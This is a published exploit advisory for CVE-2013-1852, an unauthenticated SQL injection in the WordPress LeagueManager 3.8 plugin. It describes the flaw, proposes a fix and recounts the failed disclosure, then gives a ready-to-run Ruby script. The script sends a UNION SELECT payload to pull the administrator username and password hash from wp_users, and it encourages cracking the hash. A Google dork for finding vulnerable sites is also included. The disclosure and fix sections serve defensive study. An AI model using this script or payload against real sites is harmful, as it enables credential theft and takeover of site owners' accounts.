WordPress LeagueManager 3.8 SQL Injection

`#!/usr/bin/ruby  
#  
# Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection  
# Google Dork: inurl:"/wp-content/plugins/leaguemanager/"  
# Date: 13/03/13  
# Exploit Author: Joshua Reynolds  
# Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ (No longer active)  
# Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip (No longer active)  
# Version: 3.8  
# Tested on: BT5R1 - Ubuntu 10.04.2 LTS  
# CVE: CVE-2013-1852  
#-----------------------------------------------------------------------------------------  
#Description:  
#  
#An SQL Injection vulnerability exists in the league_id parameter of a function call made  
#by the leaguemanager_export page. This request is processed within the leaguemanager.php:  
#  
#if ( isset($_POST['leaguemanager_export']))  
# $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);  
#  
#Which does not sanitize of SQL injection, and is passed to the admin/admin.php page  
#into the export( $league_id, $mode ) function which also does not sanitize for SQL injection  
#when making this call: $this->league = $leaguemanager->getLeague($league_id);  
#The information is then echoed to a CSV file that is then provided.  
#  
#Since no authentication is required when making a POST request to this page,   
#i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established  
#session.  
#  
#Fix:  
#  
#A possible fix for this would be to cast the league_id to an integer during any  
#of the function calls. The following changes can be made in the leaguemanager.php file:  
#$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);  
#  
#These functions should also not be available to public requests, and thus session handling  
#should also be checked prior to the requests being processed within the admin section.  
#  
#The responsible disclosure processes were distorted by the fact that the author no longer  
#supports his well established plugin, and there are currently no maintainers. After  
#e-mailing the folks over at [email protected] they've decided to discontinue the plugin  
#and not patch the vulnerability.  
#  
#The following ruby exploit will retrieve the administrator username and the salted   
#password hash from a given site with the plugin installed:  
#------------------------------------------------------------------------------------------  
#Exploit:  
  
require 'net/http'  
require 'uri'  
  
if ARGV.length == 2  
post_params = {  
'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\  
'9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',  
'mode' => 'teams',  
'leaguemanager_export' => 'Download+File'  
}  
  
target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"  
  
begin  
resp = Net::HTTP.post_form(URI.parse(target_url), post_params)  
rescue  
puts "Invalid URL..."  
end  
  
if resp.nil?  
print_error "No response received..."  
  
elsif resp.code != "200"  
puts "Page doesn't exist!"  
else   
admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)  
  
if(admin_login.length > 0)  
puts "Username: #{admin_login[0][0]}"  
puts "Hash: #{admin_login[0][1]}"  
puts "\nNow go crack that with Hashcat :)"  
else  
puts "Username and hash not received. Maybe it's patched?"  
end  
end  
else  
puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""  
end  
  
#Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.  
#  
#Contact:  
#Mail: [email protected]  
#Blog: infosec4breakfast.com  
#Twitter: @jershmagersh  
#Youtube: youtube.com/user/infosec4breakfast`